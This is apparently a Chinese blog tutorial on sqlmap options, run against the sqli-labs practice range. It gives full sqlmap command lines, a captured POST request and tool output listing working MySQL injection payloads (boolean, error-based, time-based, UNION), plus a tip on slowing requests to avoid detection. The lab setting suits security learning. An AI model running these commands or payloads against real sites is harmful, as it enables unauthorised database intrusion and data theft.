佛系阅读sqlmap手册(1)
–wizard 参数,这个参数非常适合像我这样的菜鸡使用,我也非常喜欢这个参数
栗子:(本文所有的栗子均来源以sqli-labs,非常棒的靶场)
只需要运行sqlmap,然后加上参数--wizard ,后面根据它的提示输入相关参数就可以了哦~
R:\deskTop\big_tools\sqlmap>python sqlmap.py --wizard
___
__H__
___ ___[.]_____ ___ ___ {1.4.4#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:38:53 /2020-04-06/
[10:38:53] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.147.145:86/Less-1/?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1
sqlmap is running, please wait..
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5144=5144 AND 'dolo'='dolo
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 2132 FROM(SELECT COUNT(*),CONCAT(0x7162627671,(SELECT (ELT(2132=2132,1))),0x716a6b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jpxT'='jpxT
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6344 FROM (SELECT(SLEEP(5)))guSZ) AND 'ZPpD'='ZPpD
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8321' UNION ALL SELECT NULL,NULL,CONCAT(0x7162627671,0x52436552544d545168525073794470557a4152735071694661766474426978636f74694d7448554f,0x716a6b7671)-- -
---
back-end DBMS: MySQL >= 5.0
banner: '5.1.73-community'
current user: 'root@localhost'
current database: 'security'
current user is DBA: True
[*] ending @ 10:39:15 /2020-04-06/
-u 和 -r
其实还有好几个比如-m,-g什么的,但是我比较菜也没有用过就不误人子弟了
-u 后面直接跟url,-r后面则是跟一个载满了”http请求包数据“的文件
先看看 -u吧
栗子:
-v 是显示输出内容的,默认是1,我这里选择0,是不想展示的内容像上面那个栗子那样占用过多篇幅。
--batch 是当sqlmap 问用户下一步因该怎么做时,自动填写默认值。假如,你想上厕所,但是你的电脑跑着sqlmap ,然后你憋不住了,这时你可以输入这个参数,放心的去上厕所了。
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-8/?id=1" -v 0 --batch
___
__H__
___ ___[)]_____ ___ ___ {1.4.4#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:03:46 /2020-04-06/
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 238 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9174=9174 AND 'ZbCb'='ZbCb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5751 FROM (SELECT(SLEEP(5)))afAO) AND 'qQtV'='qQtV
---
back-end DBMS: MySQL >= 5.0.12
[*] ending @ 11:08:20 /2020-04-06/
再来看看-r
首先呢,我们需要一个含着”http请求数据“的文件,方法有很多,我菜我只会用brup抓
数据包内容:
POST /Less-16/ HTTP/1.1
Host: 192.168.147.145:86
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.147.145:86/Less-16/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
uname=1&passwd=2&submit=Submit
栗子:
说明一下吧
--level决定了测试的级别,级别越高测试的语句就越多越细腻。
--level=2 加入了cookie注入
--level=3 加入了user-agent注入,总之级别越高测试的语句就越多,最多5,默认是1
--risk一共有3个级别,默认是1,如果是延时注入可以设置级别为2,如果希望加入or语句测试,可以选择级别3。当然这可能会存在风险,比如目标是一个update语句,使用or可能改变数据库的内容
--threads启动的线程数,由于这个栗子太慢了,所有我加上了这个参数
--dbms这个参数就是告诉sqlmap你的目标是一个上面类型的数据库,我这里的是mysql所以就直接指定了,这样可以省去测试数据库类型的时间,比如没有这个参数是,我们总会看到sql server,oracle等字眼。但是在不知道数据库类型的前提下,还是不要随便使用这个参数哦~
这里,为什么要使用--level=2,--risk=2 ? 因为默认值我没有跑出来……
R:\deskTop\big_tools\sqlmap>python sqlmap.py -r "r:\desktop\test.txt" -v 0 --batch --level=2 --threads=10 --dbms=mysql --risk=2
___
__H__
___ ___["]_____ ___ ___ {1.4.4#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:06:52 /2020-04-06/
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] Y
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 231 HTTP(s) requests:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1") AND (SELECT 7192 FROM (SELECT(SLEEP(5)))WuiI) AND ("Lynp"="Lynp&passwd=2&submit=Submit
---
[12:24:35] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
back-end DBMS: MySQL >= 5.0.12
[*] ending @ 12:25:51 /2020-04-06/
--data 干嘛的?
上面那个栗子是通过POST提交数据的,但是如果不想抓包,就想给个url,这时候sqlmap就犯迷糊了,它不知道怎么跑了。这时候,天边冒出了七彩祥云,--data 乘风而来。
栗子:
因为还是刚刚那个栗子,有缓存,所以”嗖“的一下就出结果啦~
--param-del 是指定分割参数字符的,其实也可以不填,但我有强迫症。
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-16/" --data="uname=1&passwd=2&submit=Submit" --param-del="&" --level=2 --risk=2 --threads=10 --dbms=mysql -v 0
___
__H__
___ ___[)]_____ ___ ___ {1.4.4#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:20:21 /2020-04-06/
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1") AND (SELECT 7347 FROM (SELECT(SLEEP(5)))phKj) AND ("hpDc"="hpDc&passwd=2&submit=Submit
---
back-end DBMS: MySQL >= 5.0.0
[*] ending @ 13:20:23 /2020-04-06/
--delay 为什么要延时
很多时候都是要使用这个参数的,因为sqlmap 默认是没有延时的,你让它跑它就一直跑,一直发请求。动静大了总会招来狗的嘛,如果不设置这参数,恐怕要被狗追着到处跑了。还有输入的时间是以秒为单位的。
栗子:
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-2/?id=1" --delay=0.520 --batch -v 0
___
__H__
___ ___[)]_____ ___ ___ {1.4.4#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:32:14 /2020-04-06/
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[13:32:44] [WARNING] time-based comparison requires larger statistical model, please wait............
[13:42:03] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
. (done)
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5215=5215
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 6645 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6645=6645,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 7283 FROM (SELECT(SLEEP(5)))nbsS)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5923 UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x7653766d71485154524a454f4a644366645153636643646862707575524b4479504f657a656e7376,0x716b6a6a71)-- -
---
back-end DBMS: MySQL >= 5.0
[*] ending @ 13:43:21 /2020-04-06/
如果出现了这样的字眼:
[13:42:03] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
不要慌,敲几个回车等等吧,不是工具的问题哈。可能是网络不好,或是人类内心深处急不可耐的心魔作祟
有delay就有–timeout和–retries
默认的timeout是30秒,如果觉得不合适可以自己修改
retries默认是3次,就是timeout了3次还连不上就不连了。如果一个女生绝了你3次,你还会去找她吗?把它设置为你心里的那个数吧。(说明一下,我的标准不是这个)
栗子:
R:\deskTop\big_tools\sqlmap>python sqlmap.py -u "http://192.168.147.145:86/Less-2/?id=1" --batch -v 0 --timeout=2 --retries=1
___
__H__
___ ___[)]_____ ___ ___ {1.4.4#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:48:54 /2020-04-06/
[13:48:57] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5215=5215
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 6645 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(6645=6645,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 7283 FROM (SELECT(SLEEP(5)))nbsS)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5923 UNION ALL SELECT NULL,NULL,CONCAT(0x7171626a71,0x7653766d71485154524a454f4a644366645153636643646862707575524b4479504f657a656e7376,0x716b6a6a71)-- -
---
back-end DBMS: MySQL >= 5.0
[*] ending @ 13:48:58 /2020-04-06/
今天就到这吧……